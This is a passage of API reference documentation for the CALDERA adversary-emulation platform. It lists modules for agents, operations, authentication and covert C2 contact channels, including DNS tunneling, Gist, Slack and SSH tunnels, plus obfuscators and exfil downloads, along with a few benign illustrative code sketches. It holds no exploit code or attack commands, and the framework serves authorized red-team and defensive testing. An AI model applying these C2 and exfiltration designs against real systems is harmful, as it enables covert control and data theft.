upon first check-in as a key/value pair origin_link_id : cd63fdbb-0f3a-49ea-b4eb-306a3ff40f81 in the
JSON dictionary. The CALDERA server will automatically store this pair when creating the Agent object and use it
when generating the Attack Path graph in the Debrief plugin.
NOTE: The origin_link_id key is optional and not required for the CALDERA server to register and use new
agents as expected. It is only required to take advantage of the lateral movement tracking in the Debrief plugin.
29 app
29.1.1 Subpackages
app.api namespace
Subpackages
app.api.packs namespace
Submodules
app.api.packs.advanced module
class app.api.packs.advanced.AdvancedPack(services)
Bases: BaseWorld
async enable()
app.api.packs.campaign module
class app.api.packs.campaign.CampaignPack(services)
Bases: BaseWorld
async enable()
app.api.v2 package
Subpackages
app.api.v2.handlers namespace
Submodules
app.api.v2.handlers.ability_api module
class app.api.v2.handlers.ability_api.AbilityApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.adversary_api module
class app.api.v2.handlers.adversary_api.AdversaryApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.agent_api module
class app.api.v2.handlers.agent_api.AgentApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.base_api module
property log
app.api.v2.handlers.base_object_api module
app.api.v2.handlers.config_api module
class app.api.v2.handlers.config_api.ConfigApi(services)
Bases: BaseApi
add_routes(app: Application)
async get_config_with_name(request)
async update_agents_config(request)
async update_main_config(request)
app.api.v2.handlers.contact_api module
class app.api.v2.handlers.contact_api.ContactApi(services)
Bases: BaseApi
add_routes(app: Application)
app.api.v2.handlers.fact_api module
class app.api.v2.handlers.fact_api.FactApi(services)
Bases: BaseObjectApi
async add_facts(request: Request)
add_routes(app: Application)
app.api.v2.handlers.fact_source_api module
class app.api.v2.handlers.fact_source_api.FactSourceApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.health_api module
class app.api.v2.handlers.health_api.HealthApi(services)
Bases: BaseApi
add_routes(app: Application)
async get_health_info(request)
app.api.v2.handlers.obfuscator_api module
class app.api.v2.handlers.obfuscator_api.ObfuscatorApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.objective_api module
class app.api.v2.handlers.objective_api.ObjectiveApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.operation_api module
class app.api.v2.handlers.operation_api.OperationApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.planner_api module
class app.api.v2.handlers.planner_api.PlannerApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.plugins_api module
class app.api.v2.handlers.plugins_api.PluginApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.handlers.schedule_api module
class app.api.v2.handlers.schedule_api.ScheduleApi(services)
Bases: BaseObjectApi
add_routes(app: Application)
app.api.v2.managers namespace
Submodules
app.api.v2.managers.ability_api_manager module
async update_on_disk_object(obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type)
app.api.v2.managers.adversary_api_manager module
app.api.v2.managers.agent_api_manager module
app.api.v2.managers.base_api_manager module
async create_on_disk_object(data: dict, access: dict, ram_key: str, id_property: str, obj_class: type)
async update_on_disk_object(obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type)
app.api.v2.managers.config_api_manager module
update_main_config(prop, value)
app.api.v2.managers.config_api_manager.filter_sensitive_props(config_map)
Return a copy of config_map with top-level sensitive keys removed.
app.api.v2.managers.config_api_manager.is_sensitive_prop(prop)
Return True if the input prop is a sensitive configuration property.
app.api.v2.managers.contact_api_manager module
app.api.v2.managers.fact_api_manager module
async verify_fact_integrity(data)
async verify_operation_state(new_fact)
async verify_relationship_integrity(data)
app.api.v2.managers.operation_api_manager module
class app.api.v2.managers.operation_api_manager.OperationApiManager(services)
Bases: BaseApiManager
build_ability(data: dict, executor: Executor)
validate_link_data(link_data: dict)
app.api.v2.managers.schedule_api_manager module
class app.api.v2.managers.schedule_api_manager.ScheduleApiManager(services)
Bases: OperationApiManager
create_object_from_schema(schema: SchemaMeta, data: dict, access: Access)
app.api.v2.schemas namespace
Submodules
app.api.v2.schemas.base_schemas module
app.api.v2.schemas.caldera_info_schemas module
class Meta
Bases: object
ordered = True
app.api.v2.schemas.config_schemas module
app.api.v2.schemas.deploy_command_schemas module
app.api.v2.schemas.error_schemas module
Submodules
app.api.v2.errors module
app.api.v2.responses module
app.api.v2.security module
app.api.v2.security.authentication_exempt(handler)
Mark the endpoint handler as not requiring authentication.
Note:
This only applies when the authentication_required_middleware is being used.
app.api.v2.security.authentication_required_middleware_factory(auth_svc)
Enforce authentication on every endpoint within a web application.
Note:
Any endpoint handler can opt-out of authentication using the @authentication_exempt decorator.
app.api.v2.security.is_handler_authentication_exempt(handler)
Return True if the endpoint handler is authentication exempt.
app.api.v2.validation module
app.api.v2.validation.check_not_empty_string(value, name=None)
app.api.v2.validation.check_positive_integer(value, name=None)
Module contents
app.api.v2.make_app(services)
Submodules
app.api.rest_api module
class app.api.rest_api.RestApi(services)
Bases: BaseWorld
async download_exfil_file(**params)
async download_file(request)
async enable()
async landing(request)
async login(request)
async logout(request)
async rest_core(**params)
async rest_core_info(**params)
async upload_file(request)
async validate_login(request)
app.contacts namespace
Subpackages
app.contacts.handles namespace
Submodules
app.contacts.handles.h_beacon module
class app.contacts.handles.h_beacon.Handle(tag)
Bases: object
async static run(message, services, caller)
app.contacts.tunnels namespace
Submodules
app.contacts.tunnels.tunnel_ssh module
Parameters
conn (SSHServerConnection) – The connection which was successfully opened
connection_requested(dest_host, dest_port, orig_host, orig_port)
Handle a direct TCP/IP connection request
This method is called when a direct TCP/IP connection request is received by the server. Applications
wishing to accept such connections must override this method.
To allow standard port forwarding of data on the connection to the requested destination host and port, this
method should return True.
To reject this request, this method should return False to send back a "Connection refused" response or
raise a ChannelOpenError exception with the reason for the failure.
If the application wishes to process the data on the connection itself, this method should return either an
SSHTCPSession object which can be used to process the data received on the channel or a tuple consisting
of an SSHTCPChannel object created with create_tcp_channel() and an SSHTCPSession, if the
application wishes to pass non-default arguments when creating the channel.
If blocking operations need to be performed before the session can be created, a coroutine which returns
an SSHTCPSession object can be returned instead of the session itself. This can be either returned directly
or as a part of a tuple with an SSHTCPChannel object.
By default, all connection requests are rejected.
Parameters
• dest_host (str) – The address the client wishes to connect to
• dest_port (int) – The port the client wishes to connect to
• orig_host (str) – The address the connection was originated from
• orig_port (int) – The port the connection was originated from
Returns
One of the following:
• An SSHTCPSession object or a coroutine which returns an SSHTCPSession
• A tuple consisting of an SSHTCPChannel and the above
• A callable or coroutine handler function which takes AsyncSSH stream objects for reading
from and writing to the connection
• A tuple consisting of an SSHTCPChannel and the above
• True to request standard port forwarding
• False to refuse the connection
Raises
ChannelOpenError if the connection shouldn’t be accepted
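The simplest implementation of the contract above returns True to allow standard port forwarding and False to refuse. A minimal sketch, assuming a hypothetical allowlist policy (not part of the tunnel's actual code):

```python
# Hypothetical policy: only permit forwarding to this destination.
ALLOWED_DESTINATIONS = {('127.0.0.1', 8888)}

def connection_requested(dest_host, dest_port, orig_host, orig_port):
    # True requests standard port forwarding to (dest_host, dest_port);
    # False sends back a "Connection refused" response.
    return (dest_host, dest_port) in ALLOWED_DESTINATIONS
```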
password_auth_supported()
Return whether or not password authentication is supported
This method should return True if password authentication is supported. Applications wishing to support
it must have this method return True and implement validate_password() to return whether or not the
password provided by the client is valid for the user being authenticated.
By default, this method returns False indicating that password authentication is not supported.
Returns
A bool indicating if password authentication is supported or not
validate_password(username, password)
Return whether password is valid for this user
This method should return True if the specified password is a valid password for the user being
authenticated. It must be overridden by applications wishing to support password authentication.
If the password provided is valid but expired, this method may raise PasswordChangeRequired to
request that the client provide a new password before authentication is allowed to complete. In this case, the
application must override change_password() to handle the password change request.
This method may be called multiple times with different passwords provided by the client.
Applications may wish to limit the number of attempts which are allowed. This can be done by having
password_auth_supported() begin returning False after the maximum number of attempts is exceeded.
If blocking operations need to be performed to determine the validity of the password, this method may be
defined as a coroutine.
By default, this method returns False for all passwords.
Parameters
• username (str) – The user being authenticated
• password (str) – The password sent by the client
Returns
A bool indicating if the specified password is valid for the user being authenticated
Raises
PasswordChangeRequired if the password provided is expired and needs to be changed
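The attempt-limiting idea described above can be sketched with a small standalone class. The class name and the limit of three attempts are illustrative assumptions, not the tunnel's actual implementation:

```python
class AttemptLimitingServer:
    MAX_ATTEMPTS = 3  # hypothetical limit

    def __init__(self, valid_passwords):
        self._valid = valid_passwords  # {username: password}
        self._attempts = 0

    def password_auth_supported(self):
        # Stop advertising password auth once too many attempts were made.
        return self._attempts < self.MAX_ATTEMPTS

    def validate_password(self, username, password):
        # Count every attempt, then check the supplied credentials.
        self._attempts += 1
        return self._valid.get(username) == password
```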
class app.contacts.tunnels.tunnel_ssh.Tunnel(services)
Bases: BaseWorld
server_factory()
async start()
Submodules
app.contacts.contact_dns module
class app.contacts.contact_dns.Contact(services)
Bases: BaseWorld
async start()
authoritative_resp_flag = 1024
get_opcode()
get_response_code()
has_standard_query()
is_query()
is_response()
opcode_mask = 30720
opcode_offset = 11
query_response_flag = 32768
recursion_available()
recursion_available_flag = 128
recursion_desired()
recursion_desired_flag = 256
response_code_mask = 15
truncated()
truncated_flag = 512
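The constants above are plain bitmasks over the 16-bit DNS header flags field. A minimal sketch of how methods like get_opcode() and is_response() would decode a flags value with them (the function bodies are illustrative, not the contact's actual code):

```python
QUERY_RESPONSE_FLAG = 32768   # 0x8000: set on responses
OPCODE_MASK = 30720           # 0x7800
OPCODE_OFFSET = 11
RECURSION_DESIRED_FLAG = 256  # 0x0100
RESPONSE_CODE_MASK = 15       # 0x000F

def is_response(flags):
    return bool(flags & QUERY_RESPONSE_FLAG)

def get_opcode(flags):
    # Shift the masked opcode bits down to their integer value.
    return (flags & OPCODE_MASK) >> OPCODE_OFFSET

def recursion_desired(flags):
    return bool(flags & RECURSION_DESIRED_FLAG)

def get_response_code(flags):
    return flags & RESPONSE_CODE_MASK
```

For example, a standard query with recursion desired carries flags 0x0100, while an NXDOMAIN response carries 0x8003.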
class app.contacts.contact_dns.DnsRecordType(value)
Bases: Enum
An enumeration.
A = 1
AAAA = 28
CNAME = 5
NS = 2
TXT = 16
get_bytes(byteorder='big')
max_ttl = 86400
max_txt_size = 255
min_ttl = 300
standard_pointer = 49164
class app.contacts.contact_dns.DnsResponseCodes(value)
Bases: Enum
An enumeration.
NXDOMAIN = 3
SUCCESS = 0
FileUploadData = 'ud'
FileUploadRequest = 'ur'
InstructionDownload = 'id'
PayloadDataDownload = 'pd'
PayloadFilenameDownload = 'pf'
PayloadRequest = 'pr'
class StoredResponse(data)
Bases: object
finished_reading()
read_data(num_bytes)
export_contents()
is_complete()
connection_made(transport)
Called when a connection is made.
The argument is the transport representing the pipe connection. To receive data, wait for data_received()
calls. When the connection is closed, connection_lost() is called.
datagram_received(data, addr)
Called when some datagram is received.
async generate_dns_tunneling_response_bytes(data)
app.contacts.contact_ftp module
class app.contacts.contact_ftp.Contact(services)
Bases: BaseWorld
check_config()
async ftp_server_python_new()
async ftp_server_python_old()
set_up_server()
setup_ftp_users()
async start()
async stop()
async get_payload_file(payload_dict)
app.contacts.contact_gist module
class app.contacts.contact_gist.Contact(services)
Bases: BaseWorld
class GistUpload(upload_id, filename, num_chunks)
Bases: object
add_chunk(chunk_index, contents)
export_contents()
is_complete()
async get_beacons()
Retrieve all GIST beacons for a particular api token :return: the beacons
async get_results()
Retrieve all GIST posted results for this C2’s api token :return:
async get_uploads()
Retrieve all GIST posted file uploads for this C2’s api token :return: list of (raw content, gist description,
gist filename) tuples for upload GISTs
async gist_operation_loop()
async handle_beacons(beacons)
Handles various beacon types (beacons and results)
async handle_uploads(upload_gist_info)
retrieve_config()
async start()
valid_config(token)
app.contacts.contact_gist.api_access(func)
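The GistUpload class above tracks a file upload split across several gists. Its add_chunk / is_complete / export_contents interface implies bookkeeping along these lines; the implementation below is an illustrative sketch, not the plugin's actual code:

```python
class ChunkedUpload:
    def __init__(self, upload_id, filename, num_chunks):
        self.upload_id = upload_id
        self.filename = filename
        # Chunks may arrive out of order, so preallocate slots by index.
        self.chunks = [None] * num_chunks

    def add_chunk(self, chunk_index, contents):
        self.chunks[chunk_index] = contents

    def is_complete(self):
        return all(chunk is not None for chunk in self.chunks)

    def export_contents(self):
        # Reassemble the file once every chunk has arrived.
        return b''.join(self.chunks)
```

The Slack contact's SlackUpload class exposes the same interface for the same purpose.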
app.contacts.contact_html module
class app.contacts.contact_html.Contact(services)
Bases: BaseWorld
async start()
app.contacts.contact_http module
class app.contacts.contact_http.Contact(services)
Bases: BaseWorld
async start()
app.contacts.contact_slack module
class app.contacts.contact_slack.Contact(services)
Bases: BaseWorld
class SlackUpload(upload_id, filename, num_chunks)
Bases: object
add_chunk(chunk_index, contents)
export_contents()
is_complete()
async get_beacons()
Retrieve all SLACK beacons for a particular api key :return: the beacons
async get_results()
Retrieve all SLACK posted results for this C2’s api key :return:
async get_uploads()
Retrieve all SLACK posted file uploads for this C2’s api key :return: list of (raw content, slack description,
slack filename) tuples for upload SLACKs
async handle_beacons(beacons)
Handles various beacon types (beacons and results)
async handle_uploads(upload_slack_info)
retrieve_config()
async slack_operation_loop()
async start()
async valid_config()
app.contacts.contact_slack.api_access(func)
app.contacts.contact_tcp module
class app.contacts.contact_tcp.Contact(services)
Bases: BaseWorld
async operation_loop()
async start()
async refresh()
async send(session_id: int, cmd: str, timeout: int = 60) → Tuple[int, str, str, str]
app.contacts.contact_udp module
class app.contacts.contact_udp.Contact(services)
Bases: BaseWorld
async start()
class app.contacts.contact_udp.Handler(services)
Bases: DatagramProtocol
datagram_received(data, addr)
Called when some datagram is received.
app.contacts.contact_websocket module
class app.contacts.contact_websocket.Contact(services)
Bases: BaseWorld
async start()
async stop()
class app.contacts.contact_websocket.Handler(services)
Bases: object
async handle(socket, path)
app.data_encoders namespace
Submodules
app.data_encoders.base64_basic module
class app.data_encoders.base64_basic.Base64Encoder
Bases: DataEncoder
decode(encoded_data, **_)
Returns b64 decoded bytes.
encode(data, **_)
Returns base64 encoded data.
app.data_encoders.base64_basic.load()
app.data_encoders.plain_text module
class app.data_encoders.plain_text.PlainTextEncoder
Bases: DataEncoder
decode(encoded_data, **_)
encode(data, **_)
app.data_encoders.plain_text.load()
app.learning namespace
Submodules
app.learning.p_ip module
class app.learning.p_ip.Parser
Bases: object
parse(blob)
app.learning.p_path module
class app.learning.p_path.Parser
Bases: object
parse(blob)
app.objects namespace
Subpackages
app.objects.interfaces namespace
Submodules
app.objects.interfaces.i_object module
class app.objects.interfaces.i_object.FirstClassObjectInterface
Bases: ABC
abstract store(ram)
app.objects.secondclass namespace
Submodules
app.objects.secondclass.c_executor module
display_schema = <ExecutorSchema(many=False)>
classmethod is_global_variable(variable)
replace_cleanup(command, payload)
schema = <ExecutorSchema(many=False)>
property test
Get command with app property variables replaced
class app.objects.secondclass.c_executor.ExecutorSchema(*, only: Optional[Union[Sequence[str], Set[str]]] = None, exclude: Union[Sequence[str], Set[str]] = (), many: bool = False, context: Optional[Dict] = None, load_only: Union[Sequence[str], Set[str]] = (), dump_only: Union[Sequence[str], Set[str]] = (), partial: Union[bool, Sequence[str], Set[str]] = False, unknown: Optional[str] = None)
Bases: Schema
build_executor(data, **_)
app.objects.secondclass.c_executor.get_variations(data)
app.objects.secondclass.c_fact module
load_schema = <FactSchema(many=False)>
property name
schema = <FactSchema(many=False)>
property trait
property unique
build_fact(data, **kwargs)
class app.objects.secondclass.c_fact.OriginType(value)
Bases: Enum
An enumeration.
DOMAIN = 0
IMPORTED = 3
LEARNED = 2
SEEDED = 1
USER = 4
app.objects.secondclass.c_goal module
static parse_operator(operator)
satisfied(all_facts=None)
schema = <GoalSchema(many=False)>
remove_properties(data, **_)
app.objects.secondclass.c_instruction module
schema = <InstructionSchema(many=False)>
app.objects.secondclass.c_link module
EVENT_QUEUE_STATUS_CHANGED = 'status_changed'
apply_id(host)
can_ignore()
display_schema = <LinkSchema(many=False)>
is_finished()
classmethod is_global_variable(variable)
is_valid_status(status)
load_schema = <LinkSchema(many=False)>
property pin
property raw_command
replace_origin_link_id()
schema = <LinkSchema(many=False)>
property states
property status
property unique
build_link(data, **kwargs)
fix_ability(link, **_)
fix_executor(link, **_)
prepare_dump(data, **_)
remove_properties(data, **_)
app.objects.secondclass.c_parser module
property unique
prepare_parser(data, **_)
app.objects.secondclass.c_parserconfig module
build_parserconfig(data, **_)
check_edge_target(in_data, **_)
remove_nones(data, **_)
app.objects.secondclass.c_relationship module
property flat_display
classmethod from_json(json)
load_schema = <RelationshipSchema(many=False)>
schema = <RelationshipSchema(many=False)>
property shorthand
property unique
remove_unique(data, **_)
app.objects.secondclass.c_requirement module
property unique
app.objects.secondclass.c_result module
prepare_dump(data, **_)
app.objects.secondclass.c_rule module
app.objects.secondclass.c_variation module
property raw_command
schema = <VariationSchema(many=False)>
app.objects.secondclass.c_visibility module
class app.objects.secondclass.c_visibility.Visibility
Bases: BaseObject
MAX_SCORE = 100
MIN_SCORE = 1
apply(adjustment)
property display
schema = <VisibilitySchema(many=False)>
property score
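Visibility scores are bounded to the [MIN_SCORE, MAX_SCORE] range shown above. A sketch of how apply(adjustment) might clamp the running score (illustrative only, assuming score adjustments are simple integer deltas):

```python
MIN_SCORE = 1
MAX_SCORE = 100

def apply(score, adjustment):
    # Keep the adjusted score inside the allowed range.
    return max(MIN_SCORE, min(MAX_SCORE, score + adjustment))
```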
Submodules
app.objects.c_ability module
async add_bucket(bucket)
add_executor(executor)
Add executor to map
If the executor exists, delete the current entry and add the
new executor to the bottom for FIFO
add_executors(executors)
Create executor map from list of executor objects
display_schema = <AbilitySchema(many=False)>
property executors
find_executor(name, platform)
find_executors(names, platform)
Find executors for matching platform/executor names
Only the first instance of a matching executor will be returned,
as there should not be multiple executors matching a single platform/executor name pair.
Parameters
• names (list(str)) – Executors to search. ex: [‘psh’, ‘cmd’]
• platform (str) – Platform to search. ex: windows
Returns
List of executors ordered based on ordering of names
Return type
list(Executor)
remove_all_executors()
schema = <AbilitySchema(many=False)>
store(ram)
property unique
async which_plugin()
fix_id(data, **_)
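The find_executors() lookup documented above returns at most one executor per requested name, preserving the order of the names list. A minimal sketch of that behavior, modeling Executor as a simple named tuple for illustration:

```python
from collections import namedtuple

# Simplified stand-in for the real Executor object.
Executor = namedtuple('Executor', ['name', 'platform'])

def find_executors(executors, names, platform):
    found = []
    for name in names:
        for executor in executors:
            if executor.name == name and executor.platform == platform:
                found.append(executor)  # only the first match per name
                break
    return found
```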
app.objects.c_adversary module
has_ability(ability)
schema = <AdversarySchema(many=False)>
store(ram)
property unique
async which_plugin()
fix_id(adversary, **_)
phase_to_atomic_ordering(adversary, **_)
Convert legacy adversary phases to atomic ordering
remove_properties(data, **_)
app.objects.c_agent module
async all_facts()
assign_pending_executor_change()
Return the executor change dict and remove pending change to assign. :return: Dict representing the
executor change that is assigned. :rtype: dict(str, str)
async bootstrap(data_svc)
async calculate_sleep()
async capabilities(abilities)
Get abilities that the agent is capable of running :param abilities: List of abilities to check agent capability
:type abilities: List[Ability] :return: List of abilities the agent is capable of running :rtype: List[Ability]
async deadman(data_svc)
property display_name
property executor_change_to_assign
async get_preferred_executor(ability)
Get preferred executor for ability. Will return None if the agent is not capable of running any executors in the
given ability. :param ability: Ability to get preferred executor for :type ability: Ability :return: Preferred
executor or None :rtype: Union[Executor, None]
async gui_modification(**kwargs)
async heartbeat_modification(**kwargs)
classmethod is_global_variable(variable)
async kill()
load_schema = <AgentSchema(many=False)>
privileged_to_run(ability)
replace(encoded_cmd, file_svc)
schema = <AgentSchema(many=False)>
set_pending_executor_path_update(executor_name, new_binary_path)
Mark specified executor to update its binary path to the new path. :param executor_name: name of executor
for agent to update binary path :type executor_name: str :param new_binary_path: new binary path for
executor to reference :type new_binary_path: str
set_pending_executor_removal(executor_name)
Mark specified executor to remove. :param executor_name: name of executor for agent to remove :type
executor_name: str
store(ram)
property unique
remove_nulls(in_data, **_)
remove_properties(data, **_)
app.objects.c_data_encoder module
display_schema = <DataEncoderSchema(many=False)>
schema = <DataEncoderSchema(many=False)>
store(ram)
property unique
app.objects.c_obfuscator module
load(agent)
schema = <ObfuscatorSchema(many=False)>
store(ram)
property unique
app.objects.c_objective module
property percentage
schema = <ObjectiveSchema(many=False)>
store(ram)
property unique
remove_properties(data, **_)
app.objects.c_operation module
exception app.objects.c_operation.InvalidOperationStateError
Bases: Exception
class app.objects.c_operation.Operation(name, adversary=None, agents=None, id='', jitter='2/8',
source=None, planner=None, state='running',
autonomous=True, obfuscator='plain-text', group=None,
auto_close=True, visibility=50, access=None,
use_learning_parsers=True)
Bases: FirstClassObjectInterface, BaseObject
EVENT_EXCHANGE = 'operation'
EVENT_QUEUE_COMPLETED = 'completed'
EVENT_QUEUE_STATE_CHANGED = 'state_changed'
class Reason(value)
Bases: Enum
An enumeration.
EXECUTOR = 1
FACT_DEPENDENCY = 2
OP_RUNNING = 4
PLATFORM = 0
PRIVILEGE = 3
UNTRUSTED = 5
class States(value)
Bases: Enum
An enumeration.
CLEANUP = 'cleanup'
FINISHED = 'finished'
OUT_OF_TIME = 'out_of_time'
PAUSED = 'paused'
RUNNING = 'running'
RUN_ONE_LINK = 'run_one_link'
async active_agents()
add_link(link)
async all_facts()
async all_relationships()
async apply(link)
async cede_control_to_planner(services)
async close(services)
async get_active_agent_by_paw(paw)
classmethod get_finished_states()
async get_skipped_abilities_by_agent(data_svc)
classmethod get_states()
has_link(link_id)
async is_closeable()
async is_finished()
link_status()
ran_ability_id(ability_id)
async run(services)
schema = <OperationSchema(many=False)>
set_start_details()
property state
property states
store(ram)
property unique
async update_operation_agents(services)
update_untrusted_agents(agent)
async wait_for_completion()
async wait_for_links_completion(link_ids)
Wait for started links to be completed :param link_ids: :return: None
async write_event_logs_to_disk(file_svc, data_svc, output=False)
remove_properties(data, **_)
app.objects.c_planner module
schema = <PlannerSchema(many=False)>
store(ram)
property unique
async which_plugin()
build_planner(data, **kwargs)
app.objects.c_plugin module
display_schema = <PluginSchema(many=False)>
async enable(services)
async expand(services)
load_plugin()
schema = <PluginSchema(many=False)>
store(ram)
property unique
app.objects.c_schedule module
store(ram)
property unique
Bases: Schema
build_schedule(data, **kwargs)
app.objects.c_source module
schema = <SourceSchema(many=False)>
store(ram)
property unique
build_source(data, **kwargs)
fix_adjustments(in_data, **_)
app.service namespace
Subpackages
app.service.interfaces namespace
Submodules
app.service.interfaces.i_app_svc module
class app.service.interfaces.i_app_svc.AppServiceInterface
Bases: ABC
abstract find_link(unique)
Locate a given link by its unique property :param unique: :return:
abstract find_op_with_link(link_id)
Locate an operation with the given link ID :param link_id: :return: Operation or None
abstract load_plugin_expansions(plugins)
abstract load_plugins(plugins)
Store all plugins in the data store :return:
abstract register_contacts()
abstract resume_operations()
Resume all unfinished operations :return: None
abstract retrieve_compiled_file(name, platform, location='')
abstract run_scheduler()
Kick off all scheduled jobs, as their schedule determines :return:
abstract start_sniffer_untrusted_agents()
Cyclic function that repeatedly checks if there are agents to be marked as untrusted :return: None
abstract teardown()
app.service.interfaces.i_auth_svc module
class app.service.interfaces.i_auth_svc.AuthServiceInterface
Bases: ABC
abstract apply(app, users)
Set up security on server boot :param app: :param users: :return: None
abstract check_permissions(group, request)
Check if a request is allowed based on the user permissions :param group: :param request: :return: None
abstract get_permissions(request)
abstract login_user(request)
Log the user in :param request: :return: None
abstract static logout_user(request)
Log the user out :param request: :return: None
app.service.interfaces.i_contact_svc module
class app.service.interfaces.i_contact_svc.ContactServiceInterface
Bases: ABC
abstract build_filename()
abstract handle_heartbeat()
Accept all components of an agent profile and save a new agent or register an updated heartbeat. :return:
the agent object, instructions to execute
abstract register_contact(contact)
abstract register_tunnel(tunnel)
app.service.interfaces.i_data_svc module
class app.service.interfaces.i_data_svc.DataServiceInterface
Bases: ObjectServiceInterface
abstract apply(collection)
Add a new collection to RAM
Parameters
collection –
Returns
abstract load_data(plugins)
Non-blocking read of all the data sources to populate the object store
Returns
None
app.service.interfaces.i_event_svc module
class app.service.interfaces.i_event_svc.EventServiceInterface
Bases: ABC
abstract fire_event(event, **callback_kwargs)
Fire an event :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param
callback_kwargs: Any additional parameters to pass to the event handler :return: None
abstract observe_event(event, callback)
Register an event handler :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param
callback: The function that will handle the event :return: None
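The observe/fire contract above keys handlers on an '<exchange>/<queue>' event name and forwards keyword arguments to each registered callback. A toy dispatcher illustrating just that interface contract (not the service's actual implementation):

```python
# Registry mapping event name -> list of handler callables.
_handlers = {}

def observe_event(event, callback):
    """Register an event handler for '<topic>/<subtopic>'."""
    _handlers.setdefault(event, []).append(callback)

def fire_event(event, **callback_kwargs):
    """Invoke every handler registered for the event with the kwargs."""
    for callback in _handlers.get(event, []):
        callback(**callback_kwargs)

received = []
observe_event('operation/completed', lambda **kw: received.append(kw))
fire_event('operation/completed', op_id='123')
```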
app.service.interfaces.i_file_svc module
class app.service.interfaces.i_file_svc.FileServiceInterface
Bases: ABC
abstract add_special_payload(name, func)
Call a special function when specific payloads are downloaded :param name: :param func: :return:
abstract compile_go(platform, output, src_fle, arch, ldflags, cflags, buildmode, build_dir, loop)
Dynamically compile a go file :param platform: :param output: :param src_fle: :param arch: Compile
architecture selection (defaults to AMD64) :param ldflags: A string of ldflags to use when building the go
executable :param cflags: A string of CFLAGS to pass to the go compiler :param buildmode: GO compiler
buildmode flag :param build_dir: The path the build should take place in :return:
abstract create_exfil_sub_directory(dir_name)
app.service.interfaces.i_knowledge_svc module
class app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterface
Bases: ObjectServiceInterface
abstract async add_fact(fact, constraints=None)
Add a fact to the internal store
Parameters
• fact – Fact to add
Returns
list of facts matching the criteria
abstract async get_meta_facts(meta_fact=None, agent=None, group=None)
Returns the complete set of facts associated with a meta-fact construct [In Development]
abstract async get_relationships(criteria, restrictions=None)
Retrieve relationships from the internal store
Parameters
criteria – dictionary containing fields to match on
Returns
list of matching relationships
abstract async get_rules(criteria, restrictions=None)
Retrieve rules from the internal store
Parameters
criteria – dictionary containing fields to match on
Returns
list of matching rules
abstract async update_fact(criteria, updates)
Update a fact in the internal store
Parameters
• criteria – dictionary containing fields to match on
• updates – dictionary containing fields to replace
abstract async update_relationship(criteria, updates)
Update a relationship in the internal store
Parameters
• criteria – dictionary containing fields to match on
• updates – dictionary containing fields to modify
app.service.interfaces.i_learning_svc module
class app.service.interfaces.i_learning_svc.LearningServiceInterface
Bases: ABC
abstract static add_parsers(directory)
abstract build_model()
The model is a static set of all variables used inside all ability commands. This can be used to determine
which facts - when found together - are more likely to be used together :return:
abstract learn(facts, link, blob)
app.service.interfaces.i_login_handler module
app.service.interfaces.i_object_svc module
class app.service.interfaces.i_object_svc.ObjectServiceInterface
Bases: ABC
abstract static destroy()
Clear out all data :return:
abstract restore_state()
Load data from disk :return:
abstract save_state()
Save stored data to disk :return:
app.service.interfaces.i_planning_svc module
class app.service.interfaces.i_planning_svc.PlanningServiceInterface
Bases: ABC
abstract generate_and_trim_links(agent, operation, abilities, trim)
app.service.interfaces.i_rest_svc module
class app.service.interfaces.i_rest_svc.RestServiceInterface
Bases: ABC
abstract apply_potential_link(link)
abstract construct_agents_for_group(group)
abstract delete_ability(data)
abstract delete_adversary(data)
abstract delete_agent(data)
abstract delete_operation(data)
abstract display_operation_report(data)
abstract display_result(data)
abstract download_contact_report(contact)
abstract find_abilities(paw)
abstract get_link_pin(json_data)
abstract list_payloads()
abstract update_agent_data(data)
abstract update_chain_data(data)
abstract update_config(data)
abstract update_planner(data)
Update a planner from either the GUI or REST API with new stopping conditions. This overwrites the
existing YML file. :param data: :return: the ID of the created adversary
app.service.login_handlers namespace
Submodules
app.service.login_handlers.default module
class app.service.login_handlers.default.DefaultLoginHandler(services)
Bases: LoginHandlerInterface
async handle_login(request, **kwargs)
Handle login request
Parameters
request –
Returns
the response/location of where the user is trying to navigate
Raises
HTTP exception, such as HTTPFound for redirect, or HTTPUnauthorized
async handle_login_redirect(request, **kwargs)
Handle login redirect.
Returns
login.html template if use_template is set to True in kwargs.
Raises
web.HTTPFound – HTTPFound exception to redirect to the ‘/login’ page if use_template is
set to False or not included in kwargs.
Submodules
app.service.app_svc module
class app.service.app_svc.AppService(application)
Bases: AppServiceInterface, BaseService
property errors
async find_link(unique)
Locate a given link by its unique property :param unique: :return:
async find_op_with_link(link_id)
Retrieves the operation that a link_id belongs to. Will search currently running operations first.
get_loaded_plugins()
async load_plugin_expansions(plugins=())
async load_plugins(plugins)
Store all plugins in the data store :return:
async register_contact_tunnels(contact_svc)
async register_contacts()
async run_scheduler()
Kick off all scheduled jobs, as their schedule determines :return:
async start_sniffer_untrusted_agents()
Cyclic function that repeatedly checks if there are agents to be marked as untrusted :return: None
async teardown(main_config_file='default')
async update_operations_with_untrusted_agent(untrusted_agent)
async validate_requirements()
async watch_ability_files()
app.service.auth_svc module
class app.service.auth_svc.AuthService
Bases: AuthServiceInterface, BaseService
class User(username, password, permissions)
Bases: tuple
property password
Alias for field number 1
property permissions
Alias for field number 2
property username
Alias for field number 0
async apply(app, users)
Set up security on server boot :param app: :param users: :return: None
async check_permissions(group, request)
Check if a request is allowed based on the user permissions :param group: :param request: :return: None
async create_user(username, password, group)
property default_login_handler
async get_permissions(request)
async is_request_authenticated(request)
async request_has_valid_user_session(request)
app.service.contact_svc module
class app.service.contact_svc.ContactService
Bases: ContactServiceInterface, BaseService
async build_filename()
async deregister_contacts()
async get_contact(name)
async get_tunnel(name)
async handle_heartbeat(**kwargs)
Accept all components of an agent profile and save a new agent or register an updated heartbeat. :return:
the agent object, instructions to execute
async register_contact(contact)
